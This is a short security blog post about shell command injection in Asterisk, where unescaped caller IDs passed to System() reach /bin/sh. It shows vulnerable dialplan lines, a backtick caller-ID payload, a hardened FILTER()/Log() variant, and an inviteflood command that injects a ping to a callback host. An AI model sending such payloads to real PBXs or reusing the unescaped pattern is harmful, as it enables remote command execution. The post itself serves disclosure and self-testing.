careful when using system() inside extensions.conf

If you want your Asterisk PBX to send out emails or write information into a logfile, you might find examples using the System() dialplan application.
Based on some Google/GitHub searches, you might be tempted to write something like this:

exten => 666,1,system(mail -s "Missed Call ${CALLERID(num)}" foo@bar < /path/call.msg)
exten => 666,2,system(echo "${DATETIME} - ${CALLERID(num)}" >> /log/calls)

Please be aware that there is no escaping done on the ${CALLERID(num)} variable: System() hands the expanded line to /bin/sh, so anything the caller put into the number field becomes part of the shell command.
An attacker might set the callerid to:
`some bad command`@your.pbx
The backticks are then evaluated by the shell as a command substitution, which is probably problematic. :)
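The same two dialplan lines next to a hardened variant, added here as an example and not part of the original post; the extension numbers and the /path and /log locations are just the ones used above. It relies on Asterisk's FILTER() function to whitelist the characters that may reach the shell, and on Log() to avoid the shell altogether.

```ini
[from-outside]
; --- vulnerable: ${CALLERID(num)} is pasted unescaped into a /bin/sh command line ---
exten => 666,1,System(mail -s "Missed Call ${CALLERID(num)}" foo@bar < /path/call.msg)
 same => n,System(echo "${DATETIME} - ${CALLERID(num)}" >> /log/calls)

; --- hardened: keep only digits and '+' before the value is used in a shell command ---
; FILTER(allowed-chars,string) drops every character not in the allowed set, so
; backticks, quotes, $, ;, |, > and friends never reach /bin/sh.
exten => 667,1,Set(SAFENUM=${FILTER(0-9+,${CALLERID(num)})})
 same => n,System(mail -s "Missed Call ${SAFENUM}" foo@bar < /path/call.msg)
 same => n,System(echo "${DATETIME} - ${SAFENUM}" >> /log/calls)

; Remember that CALLERID(name) is attacker-controlled as well; filter it the same
; way (or drop it) if it ever ends up inside a System() call.
 same => n,Set(SAFENAME=${FILTER(a-zA-Z0-9 ,${CALLERID(name)})})

; --- better still: no shell at all, let Asterisk write the log line itself ---
; Log() takes the text as data, so no shell metacharacter interpretation happens.
 same => n,Log(NOTICE,Missed call from ${CALLERID(num)} (${CALLERID(name)}))
```

With the hardened extension, the `some bad command`@your.pbx caller ID from above is reduced to the empty string by FILTER() and the mail is simply sent with an empty number.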

If you are looking for a quick way of testing your own PBX, take a look at inviteflood, which is part of the Kali Linux distribution:

Usage is simple:
inviteflood <interface> <user> <domain> <target-ip> <packet-count> -a <callerid>
For example:
inviteflood tun3 666 your.pbx 1 -a '`/bin/ping pingbackhost -c 1`'
(Then look for pings on 'pingbackhost' or attempts to resolve the domain.)

IT-Dienstleistungen Sven Tantau